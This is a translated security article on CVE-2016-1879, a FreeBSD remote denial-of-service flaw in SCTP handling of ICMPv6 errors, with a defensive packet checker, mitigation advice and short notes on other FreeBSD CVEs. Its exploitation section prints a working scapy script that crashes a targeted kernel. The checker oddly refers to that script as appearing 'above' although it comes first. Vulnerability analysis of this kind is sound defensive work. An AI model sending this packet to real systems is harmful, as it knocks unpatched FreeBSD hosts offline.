FreeBSD remote DoS attack analysis (CVE-2016-1879)

Source: Internet
Author: User


The FreeBSD team has announced a serious vulnerability in its operating system. Attackers can exploit it to launch DoS attacks, escalate privileges or steal sensitive system information.

SCTP ICMPv6 error handling vulnerability (CVE-2016-1879)

SCTP is a transport-layer protocol used to carry signalling traffic over IP networks. It is mainly used by mobile operators in their core networks.

This vulnerability affects several FreeBSD releases (9.3, 10.1, 10.2). Systems are affected if they support SCTP and IPv6, which is the default configuration. An attacker only needs to send a specially crafted ICMPv6 message to exploit it; a successful exploit causes a denial of service on the target system.

The DoS results from the kernel's handling of ICMPv6 error messages: the length of the SCTP header carried inside the error message is not checked carefully. When a destination does not exist, a router generates an error message and returns it to the sender via ICMPv6.

This ICMPv6 error message includes the original IPv6 packet, whose Next Header field (132) shows that SCTP is encapsulated:

[Figure: ICMPv6 error message carrying the original IPv6 header with Next Header = SCTP]

When the kernel receives an error message delivered through ICMPv6, it passes the embedded upper-layer packet to the protocol's control-input handler, sctp6_ctlinput. The SCTP handler assumes the embedded header has a valid length and tries to copy it with m_copydata(), which takes an offset and a byte count. The kernel expects a 12-byte SCTP common header, but the attacker can send an 11-byte one. The result is a NULL pointer dereference that crashes the kernel.
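The following Python script is an added illustration (it is not code from the original article and not FreeBSD's kernel code) of the length check the ICMPv6 error path needed before handing the embedded packet to sctp6_ctlinput: a message is only treated as carrying SCTP if a complete 12-byte common header is present. It parses raw ICMPv6 messages with the outer IPv6 header already removed, so it can be used as the basis of an IDS or firewall check for the mitigation section below. The header sizes and the Next Header value 132 are protocol facts; the sample messages, addresses (fe80:: and fe80::1), ports and verification tag are constructed for the demonstration.

```python
import struct

# Protocol constants (header sizes and values as defined by the IPv6, ICMPv6 and SCTP RFCs).
ICMPV6_DEST_UNREACH = 1
IPPROTO_SCTP = 132           # Next Header value for SCTP, the nh=132 used by the PoC above
IPV6_HEADER_LEN = 40
ICMPV6_ERROR_HEADER_LEN = 8  # type, code, checksum, 4 unused bytes, then the offending packet
SCTP_COMMON_HEADER_LEN = 12  # source port, destination port, verification tag, checksum


def check_icmpv6_error(icmpv6):
    """Inspect one ICMPv6 message (outer IPv6 header already stripped).

    Applies the check the vulnerable kernel lacked: refuse to treat the embedded
    payload as SCTP unless a full 12-byte common header is present.  Returns a
    dict whose 'verdict' is 'ok', 'truncated_sctp', 'not_sctp' or 'malformed'.
    """
    if len(icmpv6) < ICMPV6_ERROR_HEADER_LEN:
        return {"verdict": "malformed", "reason": "ICMPv6 header incomplete"}
    icmp_type, icmp_code = icmpv6[0], icmpv6[1]
    # Only error messages (types 0-127) carry the offending packet.
    if icmp_type >= 128:
        return {"verdict": "not_sctp", "reason": "informational ICMPv6 message"}
    inner = icmpv6[ICMPV6_ERROR_HEADER_LEN:]
    if len(inner) < IPV6_HEADER_LEN:
        return {"verdict": "malformed", "reason": "embedded IPv6 header incomplete"}
    next_header = inner[6]
    if next_header != IPPROTO_SCTP:
        return {"verdict": "not_sctp", "next_header": next_header}
    sctp = inner[IPV6_HEADER_LEN:]
    if len(sctp) < SCTP_COMMON_HEADER_LEN:
        # This is the case that crashed the kernel: a 12-byte header was copied
        # although fewer bytes were actually present.
        return {"verdict": "truncated_sctp", "icmp_type": icmp_type,
                "icmp_code": icmp_code, "sctp_bytes": len(sctp)}
    src_port, dst_port, vtag = struct.unpack("!HHI", sctp[:8])
    return {"verdict": "ok", "src_port": src_port, "dst_port": dst_port,
            "vtag": vtag, "sctp_bytes": len(sctp)}


def build_icmpv6_error(inner_payload, next_header=IPPROTO_SCTP,
                       icmp_type=ICMPV6_DEST_UNREACH, code=0):
    """Construct a sample ICMPv6 error message for testing (checksums left zero)."""
    icmp_hdr = struct.pack("!BBHI", icmp_type, code, 0, 0)
    # Embedded IPv6 header: version 6, payload length, next header, hop limit 64,
    # constructed link-local source fe80:: and destination fe80::1.
    ip6_hdr = struct.pack("!IHBB", 0x60000000, len(inner_payload), next_header, 64)
    ip6_hdr += bytes.fromhex("fe80" + "00" * 14)
    ip6_hdr += bytes.fromhex("fe80" + "00" * 12 + "0001")
    return icmp_hdr + ip6_hdr + inner_payload


# Constructed samples: a complete SCTP common header (3868 is the Diameter port),
# the same header cut to 11 bytes, an embedded IPv6 header with nothing after it
# (what the scapy PoC above sends), and an embedded TCP packet for comparison.
FULL_SCTP = struct.pack("!HHII", 3868, 3868, 0xDEADBEEF, 0)
SAMPLES = {
    "complete": build_icmpv6_error(FULL_SCTP),
    "eleven_bytes": build_icmpv6_error(FULL_SCTP[:11]),
    "empty": build_icmpv6_error(b""),
    "tcp_inner": build_icmpv6_error(b"\x00" * 20, next_header=6),
}


def flagged(samples):
    """Return the names of the samples that would have triggered the bug."""
    return sorted(name for name, msg in samples.items()
                  if check_icmpv6_error(msg)["verdict"] == "truncated_sctp")


if __name__ == "__main__":
    for name, msg in SAMPLES.items():
        print(name, check_icmpv6_error(msg))
    print("would have crashed an unpatched kernel:", flagged(SAMPLES))
```

The same decision the kernel should make, in the same order (outer ICMPv6 header, embedded IPv6 header, then the SCTP header), so that any shorter-than-expected message is rejected before a fixed-size copy is attempted.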

Vulnerability exploitation code

Exploiting this vulnerability does not require opening an SCTP socket. Scapy builds the ICMPv6 packet needed for the exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
from scapy.all import *


def get_args():
    # Command-line options: target MAC and IPv6 address, plus the interface to send on.
    parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
    parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
    parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
    parser.add_argument("-I", "--iface", type=str, help="Iface")
    options = parser.parse_args()

    if options.dst_mac is None or options.dst_ipv6 is None:
        parser.print_help()
        exit()

    return options


if __name__ == '__main__':
    options = get_args()

    # Ethernet/IPv6 to the target, an ICMPv6 Destination Unreachable error, and the
    # "original" IPv6 header with Next Header 132 (SCTP) and no SCTP header after it.
    sendp(Ether(dst=options.dst_mac) /
          IPv6(dst=options.dst_ipv6) /
          ICMPv6DestUnreach() /
          IPv6(nh=132,
               src=options.dst_ipv6,
               dst='fe80::230:56ff:fea6:648c'),
          iface=options.iface)

The following is an attack demonstration video:

Repair and Security suggestions

To protect your system from this vulnerability, we recommend that you do this:

Disable IPv6 if you do not need it. Otherwise, block ICMPv6 or IPv6 traffic at the firewall. If neither is possible, disable SCTP support in the kernel (this requires recompiling the kernel).

Alternatively, apply the vendor's patch, which adds additional validation of SCTP ICMPv6 messages. This also requires recompiling the kernel.

Other vulnerabilities

In addition, FreeBSD has been affected by other serious vulnerabilities, for which the official developers have released patches.

1. If the system has both TCP_MD5SIG and TCP_NOOPT enabled, attackers can cause a DoS through TCP connections. A listening socket with TCP_NOOPT enabled is all that is needed to trigger the bug (CVE-2016-1882, patch).

2. An error in Linux robust futex handling can leak system memory contents (CVE-2016-1880, patch).

3. An insecure default configuration lets attackers access the daemon configuration file /etc/bsnmpd.conf (CVE-2015-5677, patch).

To protect your system from these vulnerabilities, we strongly recommend that you harden your IPv6 configuration before using it and install the appropriate security tools.
